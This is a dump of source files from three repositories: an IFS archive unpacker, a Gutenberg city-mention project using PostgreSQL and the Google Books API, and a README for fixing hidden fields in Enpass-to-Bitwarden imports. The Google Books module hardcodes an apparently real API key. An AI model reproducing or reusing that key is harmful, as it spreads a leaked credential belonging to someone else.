self.tree_complete()\n\n def from_filesystem(self, tree):\n self.base_path = self.parent.base_path if self.parent else tree['path']\n self.time = int(getmtime(self.base_path))\n\n self.files = {}\n self.folders = {}\n\n for folder in tree['folders']:\n base = basename(folder['path'])\n handler = self.folder_handlers.get(base, GenericFolder)\n self.folders[base] = handler(self.ifs_data, folder, self, self.full_path, base)\n\n for filename in tree['files']:\n self.files[filename] = self.file_handler(self.ifs_data, None, self, self.full_path, filename)\n\n if not self.full_path: # root\n self.tree_complete()\n\n def tree_complete(self):\n for f in self.folders.values():\n f.tree_complete()\n for f in self.files.values():\n f.tree_complete()\n\n def repack(self, manifest, data_blob, tqdm_progress, **kwargs):\n if self.name:\n manifest = etree.SubElement(manifest, self.packed_name)\n manifest.attrib['__type'] = 's32'\n manifest.text = str(self.time)\n\n for name, entry in chain(self.folders.items(), self.files.items()):\n entry.repack(manifest, data_blob, tqdm_progress, **kwargs)\n\n @property\n def all_files(self):\n files = []\n for f in self.all_folders:\n files.extend(f.files.values())\n return files\n\n @property\n def all_folders(self):\n queue = [self]\n folders = []\n while queue:\n folder = queue.pop()\n folders.append(folder)\n 
queue.extend(folder.folders.values())\n return folders\n\n def __str__(self):\n path = self.full_path\n if not path:\n path = '<root>'\n return '{} ({} files, {} folders)'.format(path, len(self.files), len(self.folders))\n" }, { "alpha_fraction": 0.6025974154472351, "alphanum_fraction": 0.6036796569824219, "avg_line_length": 44.66666793823242, "blob_id": "9460e59d50f48c878ac5594aa837cc28135cac77", "content_id": "98b4d97e1c01ec6c344f6dde313dab493e43483e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4620, "license_type": "permissive", "max_line_length": 172, "num_lines": 99, "path": "/ifstools/ifstools.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "import argparse\r\nimport os\r\nimport multiprocessing # for pyinstaller fixes\r\nfrom sys import exit # exe freeze\r\ntry:\r\n # py 2\r\n input = raw_input\r\nexcept NameError:\r\n # py 3\r\n pass\r\n\r\nfrom .ifs import IFS\r\n\r\ndef get_choice(prompt):\r\n while True:\r\n q = input(prompt + ' [Y/n] ').lower()\r\n if not q:\r\n return True # default to yes\r\n elif q == 'y':\r\n return True\r\n elif q == 'n':\r\n return False\r\n else:\r\n print('Please answer y/n')\r\n\r\ndef extract(i, args, path):\r\n if args.progress:\r\n print('Extracting...')\r\n i.extract(path=path, **vars(args))\r\n\r\ndef repack(i, args, path):\r\n if args.progress:\r\n print('Repacking...')\r\n i.repack(path=path, **vars(args))\r\n\r\ndef main():\r\n multiprocessing.freeze_support() # pyinstaller\r\n parser = argparse.ArgumentParser(description='Unpack/pack IFS files and textures')\r\n parser.add_argument('files', metavar='file_to_unpack.ifs|folder_to_repack_ifs', type=str, nargs='+',\r\n help='files/folders to process. Files will be unpacked, folders will be repacked')\r\n parser.add_argument('-e', '--extract-folders', action='store_true', help='do not repack folders, instead unpack any IFS files inside them', dest='extract_folders')\r\n parser.add_argument('-y', action='store_true', help='don\\'t prompt for file/folder overwrite', dest='overwrite')\r\n parser.add_argument('-o', default='.', help='output directory', dest='out_dir')\r\n parser.add_argument('--tex-only', action='store_true', help='only extract textures')\r\n parser.add_argument('-c', '--canvas', action='store_true', help='dump the image canvas as defined by the texturelist.xml in _canvas.png', dest='dump_canvas')\r\n parser.add_argument('--bounds', action='store_true', help='draw image bounds on the exported canvas in red', dest='draw_bbox')\r\n parser.add_argument('--uv', action='store_true', help='crop images to uvrect (usually 1px smaller than imgrect). 
Forces --tex-only', dest='crop_to_uvrect')\r\n parser.add_argument('--no-cache', action='store_false', help='ignore texture cache, recompress all', dest='use_cache')\r\n parser.add_argument('--rename-dupes', action='store_true',\r\n help='if two files have the same name but differing case (A.png vs a.png) rename the second as \"a (1).png\" to allow both to be extracted on Windows')\r\n parser.add_argument('-m', '--extract-manifest', action='store_true', help='extract the IFS manifest for inspection', dest='extract_manifest')\r\n parser.add_argument('--super-disable', action='store_true',\r\n help='only extract files unique to this IFS, do not follow \"super\" parent references at all')\r\n parser.add_argument('--super-skip-bad', action='store_true',\r\n help='if a \"super\" IFS reference has a checksum mismatch, do not extract it')\r\n parser.add_argument('--super-abort-if-bad', action='store_true',\r\n help='if a \"super\" IFS reference has a checksum mismatch, cancel and display an error')\r\n parser.add_argument('-s', '--silent', action='store_false', dest='progress',\r\n help='don\\'t display files as they are processed')\r\n parser.add_argument('-r', '--norecurse', action='store_false', dest='recurse',\r\n help='if file contains another IFS, don\\'t extract its contents')\r\n\r\n args = parser.parse_args()\r\n\r\n if args.crop_to_uvrect:\r\n args.tex_only = True\r\n\r\n if args.extract_folders:\r\n dirs = [f for f in args.files if os.path.isdir(f)]\r\n # prune\r\n args.files = [f for f in args.files if not os.path.isdir(f)]\r\n # add the extras\r\n for d in dirs:\r\n args.files.extend((os.path.join(d,f) for f in os.listdir(d) if f.lower().endswith('.ifs')))\r\n\r\n for f in args.files:\r\n if args.progress:\r\n print(f)\r\n try:\r\n i = IFS(f, super_disable=args.super_disable, super_skip_bad=args.super_skip_bad,\r\n super_abort_if_bad=args.super_abort_if_bad)\r\n except IOError as e:\r\n # human friendly\r\n print('{}: {}'.format(os.path.basename(f), str(e)))\r\n exit(1)\r\n\r\n path = os.path.join(args.out_dir, i.default_out)\r\n if os.path.exists(path) and not args.overwrite:\r\n if not get_choice('{} exists. Overwrite?'.format(path)):\r\n continue\r\n\r\n if i.is_file:\r\n extract(i, args, path)\r\n else:\r\n repack(i, args, path)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n" } ]
17
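IFS.load_ifs in the ifstools repo above reads a fixed 36-byte header before the KBinXML manifest: a u32 signature, a u16 version plus its bitwise complement, a u32 timestamp, a u32 tree size, a u32 manifest-end offset, and, for versions above 1, the manifest's 16-byte MD5. Below is a standalone sketch of that layout using only struct; big-endian byte order is an assumption inferred from the pack('>...') calls elsewhere in the repo, since the original parser goes through kbinxml's ByteBuffer.

# Sketch of the IFS header layout parsed by IFS.load_ifs, using struct instead
# of kbinxml's ByteBuffer. Big-endian order is assumed from the '>'-format
# pack/unpack calls used elsewhere in the repo.
from struct import unpack

SIGNATURE = 0x6CAD8F89

def read_ifs_header(path):
    with open(path, 'rb') as f:
        raw = f.read(36)
    signature, version, not_version, time, tree_size, manifest_end = unpack('>IHHIII', raw[:20])
    if signature != SIGNATURE:
        raise IOError('Given file was not an IFS file!')
    assert version ^ not_version == 0xFFFF  # second u16 is just NOT(version)
    manifest_md5 = raw[20:36] if version > 1 else None
    return {'version': version, 'time': time, 'tree_size': tree_size,
            'manifest_end': manifest_end, 'manifest_md5': manifest_md5}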
Bixbeat/gutenberg-place-mentions
https://github.com/Bixbeat/gutenberg-place-mentions
cc4860a64be1b4d4d29c6b1192d3e500e3deab5d
d322c62d20dd1a21efa40a123c7aa4572f4d4afe
c28343c63c02951c3319c989d6881b8f540c83e0
refs/heads/master
2021-01-19T22:16:51.490839
2017-09-23T22:04:18
2017-09-23T22:04:18
88,785,503
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5494586825370789, "alphanum_fraction": 0.564468502998352, "avg_line_length": 38.08654022216797, "blob_id": "b77b2ffe7a415e799ee659e10c4d0a676c67d5f9", "content_id": "f58b45ac5c6133df161de206930ad95658224a58", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4064, "license_type": "permissive", "max_line_length": 175, "num_lines": 104, "path": "/lib/alter_database.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "\"\"\"\nContains all scripts that analyze the e-pub file one way or the other\n\"\"\"\n\n\ndef create_database(default_dbname, new_dbname, user, password):\n import psycopg2\n try: \n con = psycopg2.connect(\"dbname={} user={} password={}\".format(default_dbname, user, password))\n con.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n cur = con.cursor()\n except Exception as e:\n print(\"Unable to connect to the database or set the isolation level\")\n try:\n insert_query = \"\"\"CREATE DATABASE {dbname};\"\"\".format(dbname = new_dbname)\n cur.execute(insert_query)\n con.commit()\n cur.close()\n con.close()\n except:\n print(\"Failed to create database. It might already exist or you do not have the rights to make a new database.\")\n \ndef create_postgis_extension(dbname, user, password):\n import psycopg2\n con = psycopg2.connect(\"dbname={} user={} password={}\".format(dbname, user, password))\n cur = con.cursor()\n try:\n insert_query = \"\"\"CREATE EXTENSION PostGIS;\"\"\"\n cur.execute(insert_query)\n con.commit()\n except:\n print(\"Extension PostGIS already exists, or PostGIS is not installed\")\n cur.close()\n con.close()\n\ndef create_country_table(dbname, user, password, table_name, overwrite = False):\n import psycopg2\n con = psycopg2.connect(\"dbname={} user={} password={}\".format(dbname, user, password))\n cur = con.cursor()\n \n if overwrite == True:\n del_table_query = \"\"\"DROP TABLE IF EXISTS {table_name};\"\"\".format(table_name = table_name)\n cur.execute(del_table_query)\n insert_query = \"\"\"CREATE TABLE IF NOT EXISTS {table_name} (\n id \tbigint,\n time\tvarchar(50),\n latitude\tdecimal,\n longitude\tdecimal,\n selfrepcity varchar(500), \n lang\tvarchar(10),\n source\tvarchar(250),\n countrycode\tvarchar(10),\n countryname\tvarchar(250),\n location\tvarchar(250),\n url\tvarchar(100),\n text varchar(500),\n loclat decimal,\n loclong decimal);\n \"\"\".format(table_name = table_name)\n cur.execute(insert_query)\n con.commit()\n cur.close()\n con.close()\n \ndef create_gutenberg_table(dbname, user, password, table_name, overwrite = False):\n import psycopg2\n con = psycopg2.connect(\"dbname={} user={} password={}\".format(dbname, user, password))\n cur = con.cursor()\n \n if overwrite == True:\n del_table_query = \"\"\"DROP TABLE IF EXISTS {table_name};\"\"\".format(table_name = table_name)\n cur.execute(del_table_query)\n insert_query = \"\"\"CREATE TABLE IF NOT EXISTS {table_name} (\n id \tbigint,\n time\tvarchar(50),\n latitude\tdecimal,\n longitude\tdecimal,\n selfrepcity varchar(500), \n lang\tvarchar(10),\n source\tvarchar(250),\n countrycode\tvarchar(10),\n countryname\tvarchar(250),\n location\tvarchar(250),\n url\tvarchar(100),\n text varchar(500),\n loclat decimal,\n loclong decimal);\n \"\"\".format(table_name = table_name)\n cur.execute(insert_query)\n con.commit()\n cur.close()\n con.close()\n\nif __name__ == \"__main__\":\n import unittest\n\n class TestStringMethods(unittest.TestCase): \n import 
unittest\n        from analyze_epub import get_epub_metadata\n \n        def test_title(self):\n            self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['title'], 'The Declaration of Independence of the United States of America')\n        def test_creator(self):\n            self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['creator'], 'Thomas Jefferson')\n    unittest.main()" }, { "alpha_fraction": 0.7473683953285217, "alphanum_fraction": 0.75789475440979, "avg_line_length": 92, "blob_id": "b762a9c1c93f3bc00b30bf39bc1e082ca7d3211c", "content_id": "723d6e00b79843e252448f8cd67830365350570a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "permissive", "max_line_length": 92, "num_lines": 1, "path": "/lib/directory_functions.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "import os\n\nsubfolders = [directory[0] for directory in os.walk(\"D:\\cygwinfolders\\gutenberg-generated\")]\n\n" }, { "alpha_fraction": 0.53125, "alphanum_fraction": 0.53125, "avg_line_length": 11.800000190734863, "blob_id": "15eda08c183f5afc175c1a0ff801a8ab9bbd1ab4", "content_id": "19116e4b12414d16a87a83c66b24e18fadeb48bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64, "license_type": "permissive", "max_line_length": 26, "num_lines": 5, "path": "/lib/manage_epub_analysis_results.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "def upload(data):\n    return False\n\n\nif __name__ == \"__main__\":\n    pass\n" }, { "alpha_fraction": 0.6089310050010681, "alphanum_fraction": 0.618854284286499, "avg_line_length": 42.490196228027344, "blob_id": "6e7c0cedbab7ee0f6c4e72dc39ee83ccf39d45e6", "content_id": "93af4f1f060031f63069919fe6d661744f244bff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2217, "license_type": "permissive", "max_line_length": 148, "num_lines": 51, "path": "/lib/books_api_requests.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "# Source: https://www.reddit.com/r/learnpython/comments/42dqv4/python_module_to_fetch_book_info_from_google_books/\n\nimport requests\nimport re\n\nclass gbooks():\n    def __init__(self):\n        self.earliest_year = 9999\n        self.earliest_entry = None\n        self.maturity_rating = None\n        self.categories = None\n        \n        self.googleapikey=\"AIzaSyDiUD6qk39iMWSQ3Yo8Jmmnk5F0uoKFYbw\"\n\n    def search(self, title, author):\n        search_value = title + author\n        parms = {\"q\":search_value, 'key':self.googleapikey}\n        r = requests.get(url=\"https://www.googleapis.com/books/v1/volumes\", params=parms)\n        response = r.json()\n        self.retrieve_earliest_publication_date(response, title)\n    \n    def retrieve_earliest_publication_date(self, search_results, title):\n        self.earliest_year = 9999 \n        \n        for current_result in search_results[\"items\"]:\n            print(current_result[\"volumeInfo\"])\n            year = repr(current_result[\"volumeInfo\"][\"publishedDate\"])\n            matched_year = re.match(r'.*([1-3][0-9]{3})', year)\n            \n            if 'title' in current_result[\"volumeInfo\"].keys() and matched_year is not None:\n                if title in current_result[\"volumeInfo\"][\"title\"]:\n                    year = int(matched_year.group(1))\n\n                if not isinstance(year,int): year = 9999\n                if self.earliest_year > year:\n                    self.earliest_year = year\n                    self.earliest_entry = current_result\n        \n        self.set_entry_metadata()\n\n    def set_entry_metadata(self):\n        if 'maturityRating' in 
self.earliest_entry[\"volumeInfo\"].keys(): self.maturity_rating = self.earliest_entry[\"volumeInfo\"][\"maturityRating\"]\n if 'categories' in self.earliest_entry[\"volumeInfo\"].keys(): self.categories = self.earliest_entry[\"volumeInfo\"][\"categories\"]\n if 'pageCount' in self.earliest_entry[\"volumeInfo\"].keys(): self.pageCount = self.earliest_entry[\"volumeInfo\"][\"pageCount\"]\n \n\n\nif __name__ == \"__main__\":\n bk = gbooks()\n # bk.search(\"The Poetical Works of Addison; Gay's Fables; and Somerville's Chase / With Memoirs and Critical Dissertations, by the Rev. George Gilfillan Joseph Addison\")\n bk.search(\"The First Men in the Moon\", \"H. G. Wells\")" }, { "alpha_fraction": 0.8292682766914368, "alphanum_fraction": 0.8292682766914368, "avg_line_length": 81, "blob_id": "e02bc2d1277d48e28e8c147699066d0f3c6c11cd", "content_id": "0509c6793624338b7c8b8c8353949aae5e67e104", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 164, "license_type": "permissive", "max_line_length": 136, "num_lines": 2, "path": "/README.md", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "# gutenberg-place-mentions\nBy using Project Gutenberg e-books, this research answers the question of which cities are mentioned most often in classical literature.\n" }, { "alpha_fraction": 0.6336228847503662, "alphanum_fraction": 0.6474195122718811, "avg_line_length": 32.58620834350586, "blob_id": "13a3ffb55f2e8d246299f30f4bcea8b6295f5c50", "content_id": "990b5cf2b1ab615d5e0604feeb9b3eba049eae7b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1957, "license_type": "permissive", "max_line_length": 181, "num_lines": 58, "path": "/lib/analyze_epub.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "\"\"\"\nContains all scripts that analyze the e-pub file one way or the other\n\"\"\"\n\n## Script retrieved from the following location:\n## http://stackoverflow.com/questions/3114786/python-library-to-extract-epub-information\n\ndef get_epub_metadata(fname):\n import zipfile\n from lxml import etree\n \n ns = {\n 'n':'urn:oasis:names:tc:opendocument:xmlns:container',\n 'pkg':'http://www.idpf.org/2007/opf',\n 'dc':'http://purl.org/dc/elements/1.1/'\n }\n\n # prepare to read from the .epub file\n zip = zipfile.ZipFile(fname)\n\n # find the contents metafile\n txt = zip.read('META-INF/container.xml')\n tree = etree.fromstring(txt)\n cfname = tree.xpath('n:rootfiles/n:rootfile/@full-path',namespaces=ns)[0]\n\n # grab the metadata block from the contents metafile\n cf = zip.read(cfname)\n tree = etree.fromstring(cf)\n p = tree.xpath('/pkg:package/pkg:metadata',namespaces=ns)[0]\n \n # repackage the data\n res = {}\n for s in ['title','language','creator','date','identifier']:\n res[s] = p.xpath('dc:%s/text()'%(s),namespaces=ns)[0]\n print(res[s])\n return res\n\ndef process_text_in_ebook(path):\n import epub_conversion\n from epub_conversion.utils import open_book\n \n book_number = path.split(\"\\\\\")[-1]\n \n book = open_book(\"{}\\pg{}.epub\".format(path, book_number))\n lines = epub_conversion.converter.convert_epub_to_lines(book)\n return lines\n\nif __name__ == \"__main__\":\n import unittest\n\n class TestStringMethods(unittest.TestCase): \n import unittest\n \n def test_title(self):\n self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1013\\pg1013.epub')['title'], 'The Declaration of 
Independence of the United States of America')\n def test_creator(self):\n self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['creator'], 'Thomas Jefferson')\n unittest.main()\n \n " }, { "alpha_fraction": 0.672340452671051, "alphanum_fraction": 0.6851063966751099, "avg_line_length": 33.25, "blob_id": "60d27d58fabd5be93eac7f69a9a56b5a039a7bb1", "content_id": "71223caf5524330cfa8f3c6dfa3d84c7a34e8e0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1645, "license_type": "permissive", "max_line_length": 98, "num_lines": 48, "path": "/main.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "## Author: Alex Levering\n## Date: 04/19/2017\n\n\"\"\"Framework & steps:\n# 1. Parse XML, retrieve all book titles / authors / \n\n\nGet books from Gutenberg (desc)\nwget geonames (wget -r -np -k -nd http://download.geonames.org/export/dump/)\n\"\"\"\nif __name__ == \"__main__\":\n from os import chdir\n from os import walk\n import logging\n import psycopg2\n \n # Set working directory to script location\n chdir(\"D:\\git\\gutenberg\")\n \n # Script modules\n from lib import analyze_epub\n from lib import alter_database_refactored as alter_db\n \n gutenberg_db = alter_db.database_operations()\n gutenberg_db.set_database_credentials(user = \"postgres\", password = \"postgres\")\n gutenberg_db.connect_to_default_database(default_database_name = \"postgres\")\n gutenberg_db.set_project_database_name(project_database_name = \"gutenberg\")\n gutenberg_db.create_project_database()\n gutenberg_db.close_default_db_connection()\n gutenberg_db.connect_to_project_database()\n gutenberg_db.create_project_database_postgis_extension()\n \n ## Create database for location data ##\n gutenberg_db.set_location_table_name(location_table_name = \"location_lut_1000\")\n gutenberg_db.create_location_table(overwrite = False)\n gutenberg_db.insert_location_file(location_file_name = \"D:/git/gutenberg/data/cities1000.txt\")\n \n \n \n \n \n\"\"\" \n # Note-to-self: Refactor to wrapper later\n subfolders = [directory[0] for directory in walk(r'D:\\cygwinfolders\\gutenberg-generated')]\n for directory in subfolders[2:3]:\n book_text = analyze_epub.process_text_in_ebook(directory)\n print(book_text)\n\"\"\"\n\n" }, { "alpha_fraction": 0.5433210730552673, "alphanum_fraction": 0.5506890416145325, "avg_line_length": 44.24691390991211, "blob_id": "5b63aa3b202414ddff1b3f690b90aa27e4401883", "content_id": "317d0a456a0b2b2fd94d738013c48a6cbcc06740", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7329, "license_type": "permissive", "max_line_length": 175, "num_lines": 162, "path": "/lib/alter_database_refactored.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "\"\"\"\nContains all scripts that analyze the e-pub file one way or the other\n\"\"\"\nfrom importlib import import_module\n\nclass database_operations:\n def __init__(self):\n self.psycopg2 = import_module('psycopg2')\n self.logging = import_module('logging')\n \n self.user = \"\"\n self.password = \"\"\n self.default_db_con = \"\"\n self.default_db_cur = \"\"\n self.cur = \"\"\n self.con = \"\" \n \n self.location_table_name = \"\"\n self.gutenberg_table_name = \"\"\n \n def set_database_credentials(self,user, password):\n self.user = user\n self.password = password\n \n def connect_to_default_database(self, default_database_name):\n 
try:\n self.default_db_con = self.psycopg2.connect(\"dbname={} user={} password={}\".format(default_database_name, self.user, self.password))\n self.default_db_con.set_isolation_level(self.psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n self.default_db_cur = self.default_db_con.cursor()\n except BaseException as e:\n print(\"Failed to access default database: \" + str(e))\n \n def set_project_database_name(self, project_database_name):\n self.project_database_name = project_database_name\n \n def create_project_database(self):\n try:\n insert_query = \"\"\"CREATE DATABASE {dbname};\"\"\".format(dbname = self.project_database_name)\n self.default_db_cur.execute(insert_query)\n self.default_db_con.commit()\n except BaseException as e:\n print(\"Failed to create database: \" + str(e))\n \n def close_default_db_connection(self):\n self.default_db_cur.close()\n self.default_db_con.close()\n \n def execute_query(self, query, query_values = False):\n try:\n if query_values != False:\n self.cur.execute(query, query_values)\n self.con.commit()\n else:\n self.cur.execute(query)\n self.con.commit()\n except BaseException as e:\n print(\"Failed to perform query: \" + str(e))\n self.close_project_database_connection()\n self.connect_to_project_database()\n print(\"database connection has been reset\")\n \n def close_project_database_connection(self):\n self.cur.close()\n self.con.close() \n\n def connect_to_project_database(self):\n self.con = self.psycopg2.connect(\"dbname={} user={} password={}\".format(self.project_database_name, self.user, self.password))\n self.cur = self.con.cursor()\n \n def create_project_database_postgis_extension(self):\n try:\n insert_query = \"\"\"CREATE EXTENSION PostGIS;\"\"\"\n self.cur.execute(insert_query)\n self.con.commit()\n except BaseException as e:\n print(\"Could not create PostGIS extension: \" + str(e))\n self.close_project_database_connection()\n self.connect_to_project_database()\n print(\"database connection has been reset\")\n\n def set_location_table_name(self, location_table_name):\n self.location_table_name = location_table_name\n \n def create_location_table(self, overwrite = False): \n \"\"\"\n Create the country table by the struture listed in http://download.geonames.org/export/dump/readme.txt\n Hardcoded table structure because Geonames structure has not changed for a long time\n \"\"\"\n if overwrite == True:\n del_table_query = \"\"\"DROP TABLE IF EXISTS {table_name};\"\"\".format(table_name = self.location_table_name)\n self.cur.execute(del_table_query)\n \n country_lut_query = \"\"\"CREATE TABLE IF NOT EXISTS {table_name} (\n geonameid bigint,\n name varchar(200),\n normalizedname varchar(200),\n alternatenames varchar(10000),\n latitude decimal,\n longitude decimal, \n featureclass varchar(5),\n featurecode varchar(10),\n countrycode\t varchar(10),\n alternatecc varchar(200),\n admin1code\t varchar(80),\n admin2code\t varchar(80),\n admin3code\t varchar(20),\n admin4code\t varchar(20),\n elevation integer,\n dem integer,\n population integer,\n timezone varchar(80),\n modificationdate date,\n CONSTRAINT geoidentifier_{table_name} PRIMARY KEY(geonameid)\n );\"\"\".format(table_name = self.location_table_name)\n self.execute_query(country_lut_query)\n \n def insert_location_file(self, location_file_name):\n with open (location_file_name, encoding=\"utf-8\") as country_Data:\n for line in country_Data:\n location_row = line.split(\"\t\")\n self.insert_location_row(location_row)\n \n def insert_location_row(self, location_table_row):\n 
location_row_query = self.construct_query(self.location_table_name, location_table_row)\n        location_row_query = location_row_query[:-2] + \") ON CONFLICT (geonameid) DO NOTHING;\" # strip the trailing comma and space\n        self.execute_query(location_row_query, location_table_row)\n        \n    def construct_query(self, target_table, row):\n        row_query = \"\"\"INSERT INTO {tablename} VALUES (\"\"\".format(tablename = target_table)\n        for i, entry in enumerate(row):\n            row_query += \"%s, \"\n            if entry == \"\":\n                row[i] = \"-9999\"\n        return row_query \n\n    def set_gutenberg_table_name(self, gutenberg_table_name):\n        self.gutenberg_table_name = gutenberg_table_name\n        \n    def create_book_metadata_table(self, overwrite = False):\n        if overwrite == True:\n            del_table_query = \"\"\"DROP TABLE IF EXISTS {table_name};\"\"\".format(table_name = self.gutenberg_table_name)\n            self.cur.execute(del_table_query)\n        \n        gutenberg_table_query = \"\"\"CREATE TABLE IF NOT EXISTS {table_name} (\n                                        id \tbigint,\n                                        author\tvarchar(50),\n                                        year\tinteger,\n                                        title\tvarchar(200)\n                                        );\"\"\".format(table_name = self.gutenberg_table_name)\n        self.execute_query(gutenberg_table_query)\n\nif __name__ == \"__main__\":\n    import unittest\n    from analyze_epub import get_epub_metadata\n\n    class TestStringMethods(unittest.TestCase): \n        def test_title(self):\n            self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['title'], 'The Declaration of Independence of the United States of America')\n        def test_creator(self):\n            self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['creator'], 'Thomas Jefferson')\n    unittest.main()" } ]
8
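The geonames loader in this repo builds its INSERT string by hand; below is a minimal standalone sketch of the same row-per-line insert using psycopg2 placeholders. The table name, connection string, and file name are illustrative assumptions, not values taken from the repo.

```python
# Minimal sketch: parameterized insert for tab-separated geonames rows.
import psycopg2

def insert_row(cur, table, row):
    # One %s per field, e.g. "(%s, %s, %s)" for a three-column row;
    # psycopg2 substitutes each value safely, so no manual escaping.
    placeholders = ", ".join(["%s"] * len(row))
    query = f"INSERT INTO {table} VALUES ({placeholders}) ON CONFLICT DO NOTHING;"
    # Empty strings become None so numeric columns receive NULL, not ''.
    values = [field if field != "" else None for field in row]
    cur.execute(query, values)

with psycopg2.connect("dbname=gutenberg user=postgres password=postgres") as con:
    with con.cursor() as cur:
        with open("cities1000.txt", encoding="utf-8") as f:
            for line in f:
                insert_row(cur, "location_lut", line.rstrip("\n").split("\t"))
```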
jvteleco/Enpass-JSON-to-Bitwarden-converter-fix
https://github.com/jvteleco/Enpass-JSON-to-Bitwarden-converter-fix
5d53cd000609aadc7602c6f524b5fd216eb0259b
a3ea4a85641c0bcde82d92c69a55e4424150cb27
c5de6ccaeeaf017fdc3b21f2f88b2afb77af63e1
refs/heads/master
2022-04-27T23:15:42.724640
2020-04-26T13:55:35
2020-04-26T13:55:35
259,005,194
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.7745767831802368, "alphanum_fraction": 0.7849717736244202, "avg_line_length": 70.63829803466797, "blob_id": "37164c6305f56703c4c9746df2e82cd01fd17c0d", "content_id": "afecc52c800459ddab5f312bd0f1647037d39518", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3375, "license_type": "no_license", "max_line_length": 221, "num_lines": 47, "path": "/README.md", "repo_name": "jvteleco/Enpass-JSON-to-Bitwarden-converter-fix", "src_encoding": "UTF-8", "text": "# Enpass-JSON-to-Bitwarden-converter-fix\nPython script to fix the custom fields not being show as hidden on Bitwarden when importing Enpass JSON\n\n\n## Summary\nWhen importing an Enpass JSON file to Bitwarden, if you have custom fields that are hidden/marked as \"Sensitive\" on Enpass, they are imported as standard text fields in Bitwarden, not as hidden (tested on Version 2.13.2)\n\n![Enpass vs Bitwarden](images/Enpass_hidden_vs_Bitwarden.jpg) \n\n\nThe python script will compare an Enpass JSON file with a Bitwarden JSON file. If it finds fields that should be hidden, it will correct the Bitwarden JSON. You can then import this new file to your vault.\n\nDISCLAIMER: ALWAYS keep a backup of the JSON files in a secure place. This files will have all your passwords in plain text, so keep them in safe place and consider encrypting them/and put them in password protected zip. \nI do not take resposability of this script messing up or loosing info of your vault. \n\n## Pre-requisites\n- Python3 (probably will work with Python2.7 or will need small adjustments)\n- JSON python library (not sure if included by default on Python3 distribution)\n\nThis is how Enpass entry looks like, with sensitive information hidden:\n\n![Enpass hidden example](images/Enpass_hidden_example.jpg?raw=true)\n\n## Instructions\n1. Export your Enpass vault as JSON. Go to File -> Export. Select JSON and save the file to your desktop. Copy the file to the working directly and rename it to Enpass_vault.json\n2. Open Bitwarden web https://vault.bitwarden.com/ (or your own self-hosted bitwaren) and login to with your username.\n3. Navigate to Tools → Import Data. Choose from the dropdown Enpass(JSON) and select your previous created file. Upload it.\n4. Check some of the items. On the photo below you can observe how the custom \"Sensitive/password\" fields at the bottom are not hidden with *** because of the incorrect import.\n\n![Bitwarden wrong import](images/Bitwarden_imported_incorrectly.jpg) \n\n5. Go again to Tools → Export Vault.Choose JSON and put your Bitwarden password.\n6. Copy the saved file (should have a format similar to \"bitwarden_export_20200426121443.json\" to the working folder and rename it as Bitwarden_exported.json\n IMPORTANT: COPY THE FILE, do not MOVE IT. Always keep the original backup Bitwarden file. \n7. Execute the python script. It will create a new Bitwarden_fixed.json file\n8. You can check the output file Fixed_DELETE.txt to see which fields have been fixed. You can also compare the Bitwarden_exported.json with the Bitwarden_fixed.json file.\n\n **IMPORTANT: DELETE the Fixed_DELETE.txt file since it will have plain text visible password!**\n\n9. Delete your Bitwarden vault. Go to Settings → At the bottom of the page, in the \"Danger zone\" box, click \"Purge vault\"\n10. Import now the corrected file name Bitwarden_fixed.json Go to Tools → Import Data. Choose from the dropdown the first element, BITWARDEN(JSON) and select the Bitwarden_fixed.json file. 
